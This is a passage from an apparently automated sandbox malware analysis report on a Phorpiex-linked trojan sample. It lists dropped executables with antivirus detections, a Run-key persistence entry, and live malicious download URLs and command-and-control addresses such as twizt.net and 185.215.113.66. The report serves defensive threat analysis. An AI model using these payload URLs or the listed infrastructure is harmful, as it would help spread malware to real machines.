                              thcdVit1dX.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\2658326577.exe100%AviraHEUR/AGEN.1315882
                              C:\Windows\sysppvrdnvs.exe100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Temp\71384504.exe100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Temp\2658326577.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\2355412914.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe100%Joe Sandbox ML
                              C:\Windows\sysppvrdnvs.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\71384504.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\4BBF.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe82%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe66%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Temp\2355412914.exe75%ReversingLabsByteCode-MSIL.Trojan.InjectorX
                              C:\Users\user\AppData\Local\Temp\2658326577.exe82%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Temp\4BBF.exe66%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Temp\71384504.exe82%ReversingLabsWin32.Trojan.MintZard
                              C:\Windows\sysppvrdnvs.exe82%ReversingLabsWin32.Trojan.MintZard

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              bg.microsoft.map.fastly.net0%VirustotalBrowse
                              twizt.net20%VirustotalBrowse
                              fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                              http://ocsp.sectigo.com00%URL Reputationsafe
                              http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                              http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
                              https://sectigo.com/CPS00%URL Reputationsafe
                              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
                              http://185.215.113.66/pei.exe17%VirustotalBrowse

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              bg.microsoft.map.fastly.net
                              		199.232.210.172
                              		truefalseunknown
                              twizt.net
                              		185.215.113.66
                              		truetrueunknown
                              fp2e7a.wpc.phicdn.net
                              		192.229.221.95
                              		truefalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://185.215.113.66/pei.exetrueunknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#thcdVit1dX.exefalse
                              • URL Reputation: safe
                              		unknown
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0thcdVit1dX.exefalse
                              • URL Reputation: safe
                              		unknown
                              http://ocsp.sectigo.com0thcdVit1dX.exefalse
                              • URL Reputation: safe
                              		unknown
                              http://91.202.233.141/71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drtrue
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/71384504.exe.2.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://twizt.net/newtpp.exek4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#thcdVit1dX.exefalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://185.215.113.66/11sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://twizt.net/newtpp.exes4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmptrue
                                      		unknown
                                      http://185.215.113.66/pei.exe(thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.215.113.66/dersysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://185.215.113.66/3~Ysysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0thcdVit1dX.exefalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.215.113.66/71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drtrue
                                              		unknown
                                              http://91.202.233.141/dwntblsysppvrdnvs.exe, 00000004.00000002.2523875975.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2525738269.0000000005D8D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://185.215.113.66/10Ysysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#thcdVit1dX.exefalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://91.202.233.141/dwntbllsysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://twizt.net/newtpp.exe:4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://sectigo.com/CPS0thcdVit1dX.exefalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/soap/encoding/71384504.exe.2.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drfalse
                                                        		unknown
                                                        http://185.215.113.66/19YWsysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://185.215.113.66/3ZYsysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#thcdVit1dX.exefalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://185.215.113.66/3sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://185.215.113.66/2sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000770000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://185.215.113.66/1rsysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://185.215.113.66/pei.exeithcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://twizt.net/peinstall.phpshqos.dll.mui4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      http://185.215.113.66/1sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://ocsp.sectigo.com0#thcdVit1dX.exefalse
                                                                          		unknown
                                                                          http://185.215.113.66/1ssysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://91.202.233.141/dwntbltworksysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drfalse
                                                                                		unknown
                                                                                http://185.215.113.66/pei.exepthcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://185.215.113.66/1LMEM0xHmsysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://185.215.113.66/pei.exeQQC:thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ythcdVit1dX.exefalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://185.215.113.66/FYLsysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://twizt.net/peinstall.php%temp%%sthcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drtrue
                                                                                          		unknown
                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zthcdVit1dX.exefalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://91.202.233.141/dwntblZsysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://twizt.net/newtpp.exeP0thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drtrue
                                                                                              		unknown
                                                                                              http://twizt.net/peinstall.phpystem324BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                		unknown
                                                                                                http://185.215.113.66/tdrp.exesysppvrdnvs.exefalse
                                                                                                  		unknown
                                                                                                  http://twizt.net/peinstall.phpQZ4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    		unknown
                                                                                                    http://twizt.net/newtpp.exe4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      		unknown
                                                                                                      http://twizt.net/peinstall.phpthcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drtrue
                                                                                                        		unknown
                                                                                                        http://appsyndication.org/2006/appsynthcdVit1dX.exefalse
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          185.215.113.66
                                                                                                          		twizt.netPortugal
                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                          195.82.3.15
                                                                                                          		unknownKazakhstan
                                                                                                          		9198KAZTELECOM-ASKZtrue
                                                                                                          89.33.234.8
                                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                                          		136384OPTIX-AS-APOptixPakistanPvtLimitedPKfalse
                                                                                                          239.255.255.250
                                                                                                          		unknownReserved
                                                                                                          		unknownunknownfalse
                                                                                                          2.180.10.247
                                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                                          		58224TCIIRtrue
                                                                                                          89.249.62.7
                                                                                                          		unknownRussian Federation
                                                                                                          		50164RFTV-ASRUfalse
                                                                                                          149.54.47.90
                                                                                                          		unknownAfghanistan
                                                                                                          		174COGENT-174USfalse
                                                                                                          2.184.189.189
                                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                                          		58224TCIIRtrue
                                                                                                          91.202.233.141
                                                                                                          		unknownRussian Federation
                                                                                                          		9009M247GBtrue
                                                                                                          151.246.159.157
                                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                                          		31549RASANAIRtrue

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1542686
                                                                                                          Start date and time:2024-10-26 07:25:10 +02:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 7m 26s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:27
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:thcdVit1dX.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.evad.winEXE@41/21@1/10
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 50
                                                                                                          • Number of non-executed functions: 289
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.74, 40.126.32.72, 40.126.32.138, 40.126.32.133, 20.190.160.17, 40.126.32.76, 40.126.32.68, 20.109.209.108
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, login.live.com, www.update.microsoft.com, ocsp.edge.digicert.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          01:26:27API Interceptor3x Sleep call for process: sysppvrdnvs.exe modified
                                                                                                          01:26:27API Interceptor14x Sleep call for process: powershell.exe modified
                                                                                                          07:26:28AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysppvrdnvs.exe

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          185.215.113.66bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          • 185.215.113.66/4
                                                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          • 185.215.113.66/5
                                                                                                          dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          • 185.215.113.66/5
                                                                                                          GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          • 185.215.113.66/5
                                                                                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          • 185.215.113.66/5
                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 185.215.113.66/3
                                                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 185.215.113.66/2
                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 185.215.113.66/6
                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 185.215.113.66/1
                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 185.215.113.66/4
                                                                                                          239.255.255.250https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            http://fleurifleuri.com/Get hashmaliciousUnknownBrowse
                                                                                                              http://mychronictravel.eu.org/Get hashmaliciousUnknownBrowse
                                                                                                                https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
                                                                                                                  https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                    https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01Get hashmaliciousUnknownBrowse
                                                                                                                      https://deborahmeagher.com.de/kfOoB/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        Rob.Kuster@stonhard.com.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                          Bill Payment__8084746.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            zip file.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              twizt.netdgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                              • 185.215.113.66
                                                                                                                              SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                              • 185.215.113.66
                                                                                                                              qRavA0Sorz.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 185.215.113.66
                                                                                                                              qRavA0Sorz.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 185.215.113.66
